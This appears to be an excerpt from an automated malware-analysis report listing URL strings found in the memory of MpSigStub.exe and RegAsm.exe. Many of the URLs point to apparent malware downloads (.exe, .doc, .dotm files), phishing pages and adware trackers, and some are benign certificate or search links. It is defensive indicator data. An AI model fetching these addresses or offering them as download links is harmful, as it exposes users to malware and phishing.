Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/ie/
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/x
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://r.funmoods.com//
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://r.zerotime.kr/
Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0)
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org/
Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://raa.qwepoii.org/v4/gtg/
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://raggina.space/bc855646d052/spool/boot/acxbbz.dot
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://random.99lnk.com/y8btd3lq
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://randominterest.com/
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://rapidshare.com/files/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://rbmllp.com/member.php
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://readlenta.ru/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://rebrand.ly/ohxnqak
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://recoverpcerror.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://redirect.sarahwilkesphotography.co.uk)
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://redirsystem32.com
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://redirsystem32.com/tds1/in.cgi?2&group=mp3
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://redlogisticsmaroc.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://redlogisticsmaroc.com/ti/doc/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://reefer.parts/js/lib/)
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://referfile.com
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://refud.me/scan.php
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: http://registrywizard.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://relawananaksumsel.or.id/blosting/scan.html)
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://remitenow.one/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://remote-keylogger.net
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://remove.gettango.com/
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://renatopaschoal.com.br/dropbox/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://rentalhabneew.com/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://rep.eyeez.com/GetArea.aspx
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp	String found in binary or memory: http://report.wallpaper.shqingzao.com
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp	String found in binary or memory: http://report.wallpaper.shqingzao.com~
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=xl
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://requestbin.net/r/163xiqa1
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://res-backup.com/bin/3.dotm
Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp	String found in binary or memory: http://resource.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://retinnoplay.com//ord/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://retirepedia.upsproutmedia.com/obskdhi.php
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://rewards.getjar.com
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://rezultsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://rgho.st/download/8ygs8ldbj/3887c2b13922a712c34f8f2407d142bb5b2ed630/3887c2b13922a712c34f8f240
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://rghost.net/download/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://rhriss.com.br/site/tmp/swagin
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://risweg.com/flpaoql.exe
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: http://rl.ammyy.com
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://rmportal.bpweb.bp.comx
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://rmuxvayun.pkrgzrpdebksbl.gq:23513/eater.htm?little=15162&extent=kiss&switch=19450
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://rocesi.com/mncejd.exe
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://rootedmoon.co.uk/css/syle.css.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://royalambassadorschools.com/wp-admin/includes/ftools/johnhood395.php
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://roybeth.com/ext/jquery.php
Source: RegAsm.exe, 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp	String found in binary or memory: http://rpZocA.com
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://rrppdigital.com.ve/wp-content/ai1wm-backups/chrome.jpg
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://rs-moto.ru/counter/?a=1
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://ruih.co.uk/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://ruih.co.uk/wapp/doc/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://s-elisa.ru/data
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://s.earching.info/
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://s.earching.info/xA
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcd.com0_
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/111/pubid1001affid100100
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/116/pubid1004affid100400
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/119/pubid1008affid100800
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://s2.bestmanage.org/?name=%s
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-143692468872/Installer.exe
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://s3.amazonaws.com/adpk/getsavin/getsavin.ini/noproxygetoksettingslocation2http://s3.amazonaws.
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://s3.amazonaws.com/rewqqq/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://sabadabe.xyz/_output2b172f0.exe
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://saemaeul.mireene.com/skin/board/basic/bin
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://safesaver.net/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://sahane34sohbet.000webhostapp.com/wp-content/themes/elbee-elgee
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://saintechelon.tk/11.doc
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://saintechelon.tk/ejl.doc
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://sandbaggersgolf.club/viewdoc/file.php?document=y2fzyxnqqgzlcnjlci5jb20=
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://santasalete.sp.gov.br/jss/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://saraylimucevherat.com/docfile/good/)
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://saveasapp.com/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://saveimage.pw
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://savory15.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://sbrenind.com/niggab-x/niggab-x.exe
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://sc-cash.com
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://scarecrowlawncare.com/wp-content/themes/sensible-wp/img/gr.mpwq
Source: UserOOBEBroker.exe, 00000016.00000002.7225003536.000001FD6D550000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.microso
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://schildersbedrijfdickrorije.nl/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://schoolaredu.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://scorpion-swan.com/bene/dhl/dhl.php)
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://scorpion-swan.com/lamba/loginpdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://screenhost.pw/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://screw-malwrhunterteam.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://scrollayer.com
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://scud.pipis.net/
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://sds.clrsch.com/
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://sds.clrsch.com/x
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://sds.qckads.com/sidesearch/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://search.17173.com/index.jsp?keyword=%s
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://search.btchina.net/search.php?query=%s
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/search?p=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://search.getwebcake.com/
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://search.lycos.com/default.asp?src=clear
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://search.newhua.com/search.asp?Keyword=%s
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://search.psn.cn/
Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmp	String found in binary or memory: http://search.shopnav.com/
Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmp	String found in binary or memory: http://search.shopnav.com/_
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://searchengage.com
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://searchglobalsite.com/in.cgi?
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://secure4709.spaldingscpa.com/con/next.php
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://security-updater.com/binaries/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://security.symantec.com
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://seedstar.net
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://seek.3721.com/srchasst.htm
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://seliconos.3utilities.com/
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://seocom.name/seogo/go.xmn?ix
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://sepa-europa.eu
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://serbetcimimarlik.com/tests/folder/excell.php
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://server00.send6.com/1abf8588/oluwa.exe
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://server2.39slxu3bw.ru/restore.xmlscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://service.pandtelectric.com/
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: http://service.softpost.com
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://serving.myshopcouponmac.com
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zl
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://setup-mediaplayer.info/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://setup.theoreon.com
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://setup1.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://seunelson.com.br/js/10.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://seunelson.com.br/js/content.xml
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://sexfellatiomovesex.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp	String found in binary or memory: http://sf-addon.com/helper/setup/SaveFromNetHelper-Setup.exe
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://sf3q2wrq34.ddns.net
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://shintorg-k.ru/errors/wpactivt.php
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://shoppingjardin.com.py/v1/wp-themes/2.php
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://show.daohang.la:5000/go/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://silberlivigno.com/outstanding-invoices/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://silver13.net/java.exe
Source: MpSigStub.exe, 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp	String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://simplesexinc.com/file/
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://simsoshop.com/update.php?c=
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://sistemasagriculturagov.org/modulos
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://sitem.biz/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://skillfulteaching.com/cataxs/img
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://slideshowlullabies.com/plugins/content/pagenavigation/item.php)
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.ru/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.ru/krablin.exe?
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://sluzby-specjalne.cba.pl/nr26.txt
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://smpcollection.ir/poss/doc/purchase.doc
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://sndy2kungglobalinvestmentgooglednsaddres.duckdns.org/office/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://sneak.bananamikubanana.com/pc/page/set_reg.php?afrno=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://so1.5k5.net/interface?action=install&p=
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://soft.trustincash.com/url/config.xml
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
